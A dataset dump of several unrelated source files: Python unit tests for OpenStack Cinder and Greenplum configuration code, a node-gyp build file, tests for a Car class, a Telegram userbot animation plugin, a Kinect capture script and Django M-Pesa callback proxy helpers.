self.assertEqual(res.result, Result.PASS)
def test_ok_default(self):
res = self._run_with_config({'DEFAULT': {}})
self.assertEqual(res.result, Result.PASS)
class BodySize(unittest.TestCase):
conf = {'dir': ''}
def test_no_config(self):
with patch.object(utils, 'parse_openstack_ini',
side_effect=EnvironmentError()):
res = test_cinder.body_size(self.conf)
self.assertEqual(res.result, Result.SKIP)
def _run_with_config(self, os_ini):
with patch.object(utils, 'parse_openstack_ini', return_value=os_ini):
res = test_cinder.body_size(self.conf)
return res
def test_bad_def(self):
res = self._run_with_config({
'DEFAULT': {'osapi_max_request_body_size': '114688'},
'oslo_middleware': {'max_request_body_size': '999999'}})
self.assertEqual(res.result, Result.FAIL)
def test_bad_middle(self):
res = self._run_with_config({
'DEFAULT': {'osapi_max_request_body_size': '999999'},
'oslo_middleware': {'max_request_body_size': '114688'}})
self.assertEqual(res.result, Result.FAIL)
def test_ok(self):
res = self._run_with_config({
'DEFAULT': {'osapi_max_request_body_size': '114688'},
'oslo_middleware': {'max_request_body_size': '114688'}})
self.assertEqual(res.result, Result.PASS)
def test_ok_default(self):
res = self._run_with_config({})
self.assertEqual(res.result, Result.PASS)
| 37.022422 | 79 | 0.627786 | 985 | 8,256 | 4.979695 | 0.103553 | 0.038532 | 0.099083 | 0.13211 | 0.901733 | 0.897859 | 0.876045 | 0.82895 | 0.811621 | 0.76106 | 0 | 0.006259 | 0.245276 | 8,256 | 222 | 80 | 37.189189 | 0.780934 | 0 | 0 | 0.724138 | 0 | 0 | 0.144743 | 0.036701 | 0 | 0 | 0 | 0 | 0.155172 | 1 | 0.189655 | false | 0.063218 | 0.04023 | 0 | 0.356322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
88cfe0f3d2562ac58d43d7c439be586a8518f9ba | 1,552 | gyp | Python | binding.gyp | legnaleurc/node-chimera | e51b94ffe8730a93f07549e55413cc84fc43549f | [
"MIT"
] | 1 | 2015-04-19T23:32:57.000Z | 2015-04-19T23:32:57.000Z | binding.gyp | legnaleurc/node-chimera | e51b94ffe8730a93f07549e55413cc84fc43549f | [
"MIT"
] | null | null | null | binding.gyp | legnaleurc/node-chimera | e51b94ffe8730a93f07549e55413cc84fc43549f | [
"MIT"
] | null | null | null | {
'targets': [
{
'target_name': 'chimera',
'sources': [
'src/top.cc',
'src/cookiejar.cc',
'src/chimera.cc',
'src/browser.cc'
],
'conditions': [
['OS=="mac"', {
'include_dirs': [
'qt_compiled/include',
'qt_compiled/include/QtCore',
'qt_compiled/include/QtGui',
'qt_compiled/include/QtNetwork',
'qt_compiled/include/QtWebkit'
],
'libraries': [
'-framework AppKit',
'../qt_compiled/lib/libQtGui.a',
'../qt_compiled/lib/libQtCore.a',
'../qt_compiled/lib/libQtNetwork.a',
'../qt_compiled/lib/libQtWebKit.a',
'../qt_compiled/lib/libjscore.a',
'../qt_compiled/lib/libwebcore.a',
'../qt_compiled/lib/libQtXml.a'
],
}],
['OS=="linux"', {
'include_dirs': [
'qt_compiled/include',
'qt_compiled/include/QtCore',
'qt_compiled/include/QtGui',
'qt_compiled/include/QtNetwork',
'qt_compiled/include/QtWebKit'
],
'libraries': [
'../qt_compiled/lib/libQtCore.a',
'../qt_compiled/lib/libQtGui.a',
'../qt_compiled/lib/libQtXml.a',
'../qt_compiled/lib/libQtNetwork.a',
'../qt_compiled/lib/libQtWebKit.a',
'../qt_compiled/lib/libwebcore.a',
'../qt_compiled/lib/libjscore.a'
],
}]
]
}
]
}
| 29.283019 | 48 | 0.474871 | 138 | 1,552 | 5.144928 | 0.246377 | 0.338028 | 0.256338 | 0.23662 | 0.839437 | 0.839437 | 0.788732 | 0.788732 | 0.64507 | 0.557746 | 0 | 0 | 0.353737 | 1,552 | 52 | 49 | 29.846154 | 0.707876 | 0 | 0 | 0.519231 | 0 | 0 | 0.552191 | 0.414948 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
00105fd64c90c6c1626745900ad3ef30f5bb34a2 | 9,937 | py | Python | gpMgmt/bin/gppylib/operations/test/unit/test_unit_configurationImplGpdb.py | haolinw/gpdb | 16a9465747a54f0c61bac8b676fe7611b4f030d8 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/operations/test/unit/test_unit_configurationImplGpdb.py | haolinw/gpdb | 16a9465747a54f0c61bac8b676fe7611b4f030d8 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/operations/test/unit/test_unit_configurationImplGpdb.py | haolinw/gpdb | 16a9465747a54f0c61bac8b676fe7611b4f030d8 | [
"PostgreSQL",
"Apache-2.0"
] | 1 | 2022-03-18T03:08:11.000Z | 2022-03-18T03:08:11.000Z | #!/usr/bin/env python3
import unittest
from gppylib.gparray import GpArray, Segment
from gppylib.system.configurationImplGpdb import GpConfigurationProviderUsingGpdbCatalog
from mock import Mock, patch
class ConfigurationImplGpdbTestCase(unittest.TestCase):
def setUp(self):
self.maxDiff = None
self.configProvider = GpConfigurationProviderUsingGpdbCatalog()
self.conn = Mock()
self.coordinator = Segment.initFromString("1|-1|p|p|s|u|cdw|cdw|5432|/data/coordinator")
self.primary0 = Segment.initFromString("2|0|p|p|s|u|sdw1|sdw1|40000|/data/primary0")
self.primary1 = Segment.initFromString("3|1|p|p|s|u|sdw2|sdw2|40001|/data/primary1")
self.mirror0 = Segment.initFromString("4|0|m|m|s|u|sdw2|sdw2|50000|/data/mirror0")
self.acting_mirror0 = Segment.initFromString("6|0|m|p|d|n|sdw2|sdw2|50002|/data/acting_mirror0")
self.mirror1 = Segment.initFromString("5|1|m|m|s|u|sdw1|sdw1|50001|/data/mirror1")
segments = [self.coordinator,self.primary0,self.primary1,self.mirror0,self.mirror1]
self.gpArray = GpArray(segments)
self.gpArray.setSegmentsAsLoadedFromDb(segments)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[6])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemoveMirror_remove_acting_mirror(self, mockInsert, mockFetch):
addSQL = self.configProvider.updateSystemConfigRemoveMirror(self.conn, self.gpArray, self.acting_mirror0, "foo")
self.assertEqual(addSQL, "SELECT gp_add_segment(6::int2, 0::int2, 'm', 'p', 'n', 'd', 50002, 'sdw2', 'sdw2', '/data/acting_mirror0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t6,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 6'\n)")
mockFetch.assert_called_with(self.conn, "SELECT gp_remove_segment_mirror(0::int2)")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 6,\n 'foo: removed mirror segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[4])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemoveMirror_remove_actual_mirror(self, mockInsert, mockFetch):
addSQL = self.configProvider.updateSystemConfigRemoveMirror(self.conn, self.gpArray, self.mirror0, "foo")
self.assertEqual(addSQL, "SELECT gp_add_segment(4::int2, 0::int2, 'm', 'm', 'n', 'd', 50000, 'sdw2', 'sdw2', '/data/mirror0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t4,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 4'\n)")
mockFetch.assert_called_with(self.conn, "SELECT gp_remove_segment_mirror(0::int2)")
mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 4,\n 'foo: removed mirror segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[2])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemovePrimary(self, mockInsert, mockFetch):
    """Removing the primary (dbid 2, content 0) must return backout SQL
    re-adding it and log the removal; note primaries are removed by dbid
    (gp_remove_segment), not by content id like mirrors."""
    addSQL = self.configProvider.updateSystemConfigRemovePrimary(self.conn, self.gpArray, self.primary0, "foo")
    # Backout SQL: re-add the (now down) segment plus a history insert.
    self.assertEqual(addSQL, "SELECT gp_add_segment(2::int2, 0::int2, 'm', 'm', 'n', 'd', 40000, 'sdw1', 'sdw1', '/data/primary0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t2,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 2'\n)")
    # Primary removal is keyed by dbid.
    mockFetch.assert_called_with(self.conn, "SELECT gp_remove_segment(2::int2)")
    mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 2,\n 'foo: removed primary segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[6])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigAddMirror_add_acting_mirror(self, mockInsert, mockFetch):
    """Adding the acting mirror (dbid 6) must return backout SQL that would
    remove it again, issue gp_add_segment for the new row, and log the insert."""
    removeSQL = self.configProvider.updateSystemConfigAddMirror(self.conn, self.gpArray, self.acting_mirror0, "foo")
    # Backout SQL: drop the just-added segment plus a history insert.
    self.assertEqual(removeSQL, "SELECT gp_remove_segment(6::int2);\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t6,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 6'\n)")
    # Catalog update actually issued: add the segment as a mirror ('m'/'m').
    mockFetch.assert_called_with(self.conn, "SELECT gp_add_segment(6::int2, 0::int2, 'm', 'm', 'n', 'd', 50002, 'sdw2', 'sdw2', '/data/acting_mirror0')")
    mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 6,\n 'foo: inserted mirror segment configuration'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[4])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigAddMirror_add_actual_mirror(self, mockInsert, mockFetch):
    """Adding the actual mirror (dbid 4) must return backout SQL removing it,
    issue gp_add_segment for the new row, and log the insert to history."""
    removeSQL = self.configProvider.updateSystemConfigAddMirror(self.conn, self.gpArray, self.mirror0, "foo")
    # Backout SQL: drop the just-added segment plus a history insert.
    self.assertEqual(removeSQL, "SELECT gp_remove_segment(4::int2);\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t4,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 4'\n)")
    # Catalog update actually issued: add the segment as a mirror ('m'/'m').
    mockFetch.assert_called_with(self.conn, "SELECT gp_add_segment(4::int2, 0::int2, 'm', 'm', 'n', 'd', 50000, 'sdw2', 'sdw2', '/data/mirror0')")
    mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 4,\n 'foo: inserted mirror segment configuration'\n)", 1)
# side_effect: first fetch returns the new dbid [2], second returns the content id [0].
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', side_effect=[ [2], [0] ])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigAddPrimary(self, mockInsert, mockFetch):
    """Adding the primary (dbid 2, content 0) must return backout SQL removing
    its mirror row by content id, look up the assigned content id, add the
    segment as an up primary ('p'/'p', 'u'), and log the insert."""
    removeSQL = self.configProvider.updateSystemConfigAddPrimary(self.conn, self.gpArray, self.primary0, "foo", {0: self.mirror0})
    # Backout SQL: remove by content id plus a history insert.
    self.assertEqual(removeSQL, "SELECT gp_remove_segment_mirror(0::int2);\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t2,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 2'\n)")
    # The content id of the new row is read back from the catalog ...
    mockFetch.assert_any_call(self.conn, "SELECT content FROM pg_catalog.gp_segment_configuration WHERE dbId = 2")
    # ... and the segment is added as an up primary.
    mockFetch.assert_any_call(self.conn, "SELECT gp_add_segment(2::int2, 0::int2, 'p', 'p', 'n', 'u', 40000, 'sdw1', 'sdw1', '/data/primary0')")
    mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 2,\n 'foo: inserted primary segment configuration with contentid 0'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[6])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemoveAddMirror_remove_acting_mirror(self, mockInsert, mockFetch):
    """Remove+re-add of the acting mirror (dbid 6) must return both backout
    statements: addSQL undoing the removal and removeSQL undoing the add;
    the catalog itself sees a remove-by-content followed by a fresh add."""
    addSQL, removeSQL = self.configProvider.updateSystemConfigRemoveAddMirror(self.conn, self.gpArray, self.acting_mirror0, "foo")
    # Backout for the removal: re-add the original row ('m'/'p') plus history.
    self.assertEqual(addSQL, "SELECT gp_add_segment(6::int2, 0::int2, 'm', 'p', 'n', 'd', 50002, 'sdw2', 'sdw2', '/data/acting_mirror0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t6,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 6'\n)")
    # Backout for the add: drop the freshly inserted row.
    self.assertEqual(removeSQL, "SELECT gp_remove_segment(6::int2)")
    # Catalog updates actually issued: remove mirror, then re-add it as 'm'/'m'.
    mockFetch.assert_any_call(self.conn, "SELECT gp_remove_segment_mirror(0::int2)")
    mockFetch.assert_any_call(self.conn, "SELECT gp_add_segment(6::int2, 0::int2, 'm', 'm', 'n', 'd', 50002, 'sdw2', 'sdw2', '/data/acting_mirror0')")
    mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 6,\n 'foo: inserted segment configuration for full recovery or original dbid 6'\n)", 1)
@patch('gppylib.system.configurationImplGpdb.GpConfigurationProviderUsingGpdbCatalog.fetchSingleOutputRow', return_value=[4])
@patch('gppylib.db.dbconn.executeUpdateOrInsert')
def test_updateSystemConfigRemoveAddMirror_remove_actual_mirror(self, mockInsert, mockFetch):
    """Remove+re-add of the actual mirror (dbid 4) must return both backout
    statements and issue remove-by-content followed by a fresh add."""
    addSQL, removeSQL = self.configProvider.updateSystemConfigRemoveAddMirror(self.conn, self.gpArray, self.mirror0, "foo")
    # Backout for the removal: re-add the original row plus history.
    self.assertEqual(addSQL, "SELECT gp_add_segment(4::int2, 0::int2, 'm', 'm', 'n', 'd', 50000, 'sdw2', 'sdw2', '/data/mirror0');\nINSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\n\tnow(),\n\t4,\n\t'gprecoverseg: segment config for backout: inserted segment configuration for full recovery or original dbid 4'\n)")
    # Backout for the add: drop the freshly inserted row.
    self.assertEqual(removeSQL, "SELECT gp_remove_segment(4::int2)")
    # Catalog updates actually issued: remove mirror, then re-add it.
    mockFetch.assert_any_call(self.conn, "SELECT gp_remove_segment_mirror(0::int2)")
    mockFetch.assert_any_call(self.conn, "SELECT gp_add_segment(4::int2, 0::int2, 'm', 'm', 'n', 'd', 50000, 'sdw2', 'sdw2', '/data/mirror0')")
    mockInsert.assert_any_call(self.conn, "INSERT INTO gp_configuration_history (time, dbid, \"desc\") VALUES(\nnow(),\n 4,\n 'foo: inserted segment configuration for full recovery or original dbid 4'\n)", 1)
| 104.6 | 346 | 0.742377 | 1,242 | 9,937 | 5.809984 | 0.096618 | 0.031042 | 0.042129 | 0.05765 | 0.846729 | 0.836752 | 0.823309 | 0.787001 | 0.778409 | 0.724501 | 0 | 0.029679 | 0.115025 | 9,937 | 94 | 347 | 105.712766 | 0.79088 | 0.002113 | 0 | 0.278481 | 0 | 0.341772 | 0.552295 | 0.285426 | 0 | 0 | 0 | 0 | 0.367089 | 1 | 0.113924 | false | 0 | 0.050633 | 0 | 0.177215 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
004ce0bd22e8ee64f43db1cfbd07722f54e195ec | 6,282 | py | Python | testing/test/car/car_manager_test.py | Xamaneone/Python-OOP | 7514cdc92bb4f7adf27666516739cbf42a35453c | [
"MIT"
] | null | null | null | testing/test/car/car_manager_test.py | Xamaneone/Python-OOP | 7514cdc92bb4f7adf27666516739cbf42a35453c | [
"MIT"
] | null | null | null | testing/test/car/car_manager_test.py | Xamaneone/Python-OOP | 7514cdc92bb4f7adf27666516739cbf42a35453c | [
"MIT"
] | null | null | null | import unittest
from car_manager import Car
class CarTests(unittest.TestCase):
    """Unit tests for ``car_manager.Car``.

    Fix over the previous version: the original exercised the Car properties
    with *call* syntax (``car.make("")``, ``car.fuel_amount(5)``), which raises
    ``TypeError: 'str'/'int' object is not callable`` instead of triggering the
    setter — making the assertRaises tests pass for the wrong reason and the
    "expect changed" tests fail outright.  Properties are now exercised with
    assignment.  The two ``drive`` tests also set ``fuel_capacity`` where they
    clearly meant ``fuel_amount`` (50 - 100km * 10/100km == 40).
    """

    make = 'make'
    model = 'model'
    fuel_consumption = 10
    fuel_capacity = 100

    def setUp(self):
        # Fresh Car per test; every test previously built this same instance.
        self.car = Car(self.make, self.model, self.fuel_consumption, self.fuel_capacity)

    # --- make -------------------------------------------------------------
    def test_car_make_setter__when_None__expect_exception(self):
        with self.assertRaises(Exception) as context:
            self.car.make = None
        self.assertEqual('Make cannot be null or empty!', str(context.exception))

    def test_car_make_setter__when_empty__expect_exception(self):
        with self.assertRaises(Exception) as context:
            self.car.make = ""
        self.assertEqual('Make cannot be null or empty!', str(context.exception))

    def test_car_make_setter__when_provided_test__expect_make_to_be_changed(self):
        expect = "test"
        self.car.make = expect
        self.assertEqual(expect, self.car.make)

    # --- model ------------------------------------------------------------
    def test_car_model_setter__when_None__expect_exception(self):
        with self.assertRaises(Exception) as context:
            self.car.model = None
        self.assertEqual('Model cannot be null or empty!', str(context.exception))

    def test_car_model_setter__when_empty__expect_exception(self):
        with self.assertRaises(Exception) as context:
            self.car.model = ''
        self.assertEqual('Model cannot be null or empty!', str(context.exception))

    def test_car_model_setter__when_provided_test__expect_model_to_be_changed(self):
        expect = "test"
        self.car.model = expect
        self.assertEqual(expect, self.car.model)

    # --- fuel_consumption ---------------------------------------------------
    def test_car_fuel_consumption_getter__when_changed__expect_to_be_changed(self):
        self.car.fuel_consumption = 5
        self.assertEqual(5, self.car.fuel_consumption)

    def test_car_fuel_consumption_getter__when_changed_with_negative__expect_exception(self):
        with self.assertRaises(Exception):
            self.car.fuel_consumption = -5

    def test_car_fuel_consumption_setter__when_None__expect_exception(self):
        with self.assertRaises(Exception):
            self.car.fuel_consumption = None

    def test_car_fuel_consumption_setter__when_changing__expect_to_be_changed(self):
        self.car.fuel_consumption = 14
        self.assertEqual(14, self.car.fuel_consumption)

    # --- refuel -------------------------------------------------------------
    def test_car_refuel__when_provided_fuel_is_0__expect_exception(self):
        with self.assertRaises(Exception):
            self.car.refuel(0)

    def test_car_refuel__when_provided_fuel_is_negative__expect_exception(self):
        with self.assertRaises(Exception):
            self.car.refuel(-1)

    def test_car_refuel__when_provided_fuel_is_correct__expect_to_increase_fuel_amount_by_provided_fuel(self):
        fuel = 50
        self.car.refuel(fuel)
        self.assertEqual(fuel, self.car.fuel_amount)

    def test_car_refuel__when_provided_fuel_is_more_than_fuel_capacity__expect_to_increase_fuel_amount_to_fuel_capacity(self):
        # Refueling more than fits must cap the amount at fuel_capacity (100).
        self.car.refuel(self.car.fuel_capacity * 3)
        self.assertEqual(100, self.car.fuel_amount)

    # --- fuel_amount --------------------------------------------------------
    def test_car_fuel_amount_setter__when_changed__expect_to_be_changed(self):
        self.car.fuel_amount = 5
        self.assertEqual(5, self.car.fuel_amount)

    def test_car_fuel_amount_setter__when_changed_with_negative__expect_exception(self):
        with self.assertRaises(Exception):
            self.car.fuel_amount = -50

    def test_car_fuel_amount_setter__when_None__expect_exception(self):
        with self.assertRaises(Exception):
            self.car.fuel_amount = None

    def test_car_fuel_amount_setter__when_negative__expect_exception(self):
        with self.assertRaises(Exception):
            self.car.fuel_amount = -50

    # --- drive --------------------------------------------------------------
    def test_car_drive__when_enough_fuel__expect_lowered_fuel(self):
        # 100 km at 10 l/100km consumes 10 l: 50 -> 40.
        self.car.fuel_amount = 50
        self.car.drive(100)
        self.assertEqual(40, self.car.fuel_amount)

    def test_car_drive__when_not_enough_fuel__expect_exception(self):
        self.car.fuel_amount = 50
        with self.assertRaises(Exception):
            self.car.drive(1000)

    # --- fuel_capacity ------------------------------------------------------
    def test_car_fuel_capacity_setter__when_None__except_exception(self):
        with self.assertRaises(Exception):
            self.car.fuel_capacity = None

    def test_car_fuel_capacity_setter__when_changed__except_to_be_changed(self):
        self.car.fuel_capacity = 60
        self.assertEqual(60, self.car.fuel_capacity)

    def test_car_fuel_capacity_setter__when_negative__except_exception(self):
        with self.assertRaises(Exception):
            self.car.fuel_capacity = -16
# Allow running this test module directly: ``python car_manager_test.py``.
if __name__ == '__main__':
    unittest.main()
| 41.328947 | 126 | 0.724928 | 845 | 6,282 | 4.985799 | 0.078107 | 0.087349 | 0.054593 | 0.07643 | 0.892713 | 0.842867 | 0.810824 | 0.764301 | 0.717304 | 0.717304 | 0 | 0.009404 | 0.18752 | 6,282 | 151 | 127 | 41.602649 | 0.816027 | 0 | 0 | 0.441441 | 0 | 0 | 0.022763 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 1 | 0.207207 | false | 0 | 0.018018 | 0 | 0.27027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9dde919659995a9643af3c0223feb9c3622f730c | 6,863 | py | Python | userbot/plugins/marte.py | rxrx3/IndianBot | 19d52ae46b30c4fef56762415b0e43204f8c1220 | [
"MIT"
] | null | null | null | userbot/plugins/marte.py | rxrx3/IndianBot | 19d52ae46b30c4fef56762415b0e43204f8c1220 | [
"MIT"
] | null | null | null | userbot/plugins/marte.py | rxrx3/IndianBot | 19d52ae46b30c4fef56762415b0e43204f8c1220 | [
"MIT"
] | 1 | 2020-09-11T16:37:56.000Z | 2020-09-11T16:37:56.000Z | from telethon import events
import asyncio
from uniborg.util import admin_cmd
@borg.on(admin_cmd(pattern=r"marte"))
async def _(event):
    """``.marte`` animation: repeatedly edits the message, flipping a two-frame
    🔵🔴 banner in place.

    Fixes over the previous version:
    - The original indexed ``animation_chars[i % 549755813888]`` — a modulus
      equal to the loop bound, so the index never wrapped and the handler
      crashed with IndexError once ``i`` passed the ~150 hard-coded frames.
      We now wrap on the actual frame count.
    - The ~150 literal list entries were just two alternating strings; they
      are reduced to the two unique frames.
    """
    if event.fwd_from:
        return
    animation_interval = 0.3  # seconds between message edits
    animation_ttl = range(0, 549755813888)  # effectively "animate forever"
    await event.edit("🔵🔴 🔴🔵")
    # The two alternating frames (runtime strings preserved byte-for-byte).
    animation_chars = [
        "`🔵🔴 MARTE PICCOLA KAWAII 🔴🔵`",
        "`🔴🔵 MARTE PICCOLA KAWAII 🔵🔴`",
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % len(animation_chars)])
| 41.847561 | 59 | 0.422264 | 780 | 6,863 | 4.446154 | 0.048718 | 0.49827 | 0.747405 | 0.420992 | 0.913495 | 0.913495 | 0.913495 | 0.913495 | 0.913495 | 0.913495 | 0 | 0.006372 | 0.382632 | 6,863 | 163 | 60 | 42.104294 | 0.675242 | 0 | 0 | 0.90566 | 0 | 0 | 0.588955 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018868 | 0 | 0.025157 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9dec51afc8bcb23268f8d45d87a79e9fda3cd634 | 169 | py | Python | misc/KinectSnap.py | FYP-DES5/deepscan-core | b6ce70ae69577fbdf5b80b30c4e83c7ee9cf6942 | [
"MIT"
] | null | null | null | misc/KinectSnap.py | FYP-DES5/deepscan-core | b6ce70ae69577fbdf5b80b30c4e83c7ee9cf6942 | [
"MIT"
] | null | null | null | misc/KinectSnap.py | FYP-DES5/deepscan-core | b6ce70ae69577fbdf5b80b30c4e83c7ee9cf6942 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import freenect
import sys
freenect.sync_get_depth()[0].dump(sys.argv[-1] + "_depth.p")
freenect.sync_get_video()[0].dump(sys.argv[-1] + "_video.p")
| 21.125 | 60 | 0.704142 | 29 | 169 | 3.896552 | 0.517241 | 0.212389 | 0.265487 | 0.212389 | 0.230089 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.076923 | 169 | 7 | 61 | 24.142857 | 0.698718 | 0.094675 | 0 | 0 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d17ab5304943b21d45adc6fe74f53b47f43a0a24 | 2,771 | py | Python | zazi/apps/mpesa_proxy/utils.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | null | null | null | zazi/apps/mpesa_proxy/utils.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | 1 | 2021-08-20T06:41:57.000Z | 2021-08-20T06:41:57.000Z | zazi/apps/mpesa_proxy/utils.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | null | null | null | from zazi.core import service
from django.conf import settings
from django.shortcuts import reverse
#-------
def _proxy_post(url_name, data, organization_id, reference):
    """Resolve the named Django route for (organization_id, reference) and
    POST *data* as JSON to it on the M-Pesa API host.

    Shared implementation for every forwarder below — the nine public
    functions previously repeated this body verbatim, differing only in the
    route name.  Their signatures and behavior are unchanged.
    """
    url = reverse(url_name, kwargs={
        "organization_id": organization_id,
        "reference": reference,
    })
    return service.post(url, json=data, api_url=settings.MPESA_API_URL)


#------- C2B (customer-to-business) callbacks
def c2b_stk_push_callback_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_c2b_stk_push_callback_url', data, organization_id, reference)

def c2b_validation_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_c2b_validation_url', data, organization_id, reference)

def c2b_confirmation_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_c2b_confirmation_url', data, organization_id, reference)

#------- Account-balance check results
def balance_check_result_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_balance_check_result_url', data, organization_id, reference)

def balance_check_queue_timeout_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_balance_check_queue_timeout_url', data, organization_id, reference)

#------- Transaction-reversal results
def reversal_result_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_reversal_result_url', data, organization_id, reference)

def reversal_queue_timeout_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_reversal_queue_timeout_url', data, organization_id, reference)

#------- B2C (business-to-customer) results
def b2c_result_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_b2c_result_url', data, organization_id, reference)

def b2c_queue_timeout_url(data, organization_id=None, reference=None):
    return _proxy_post('mpesa_b2c_queue_timeout_url', data, organization_id, reference)
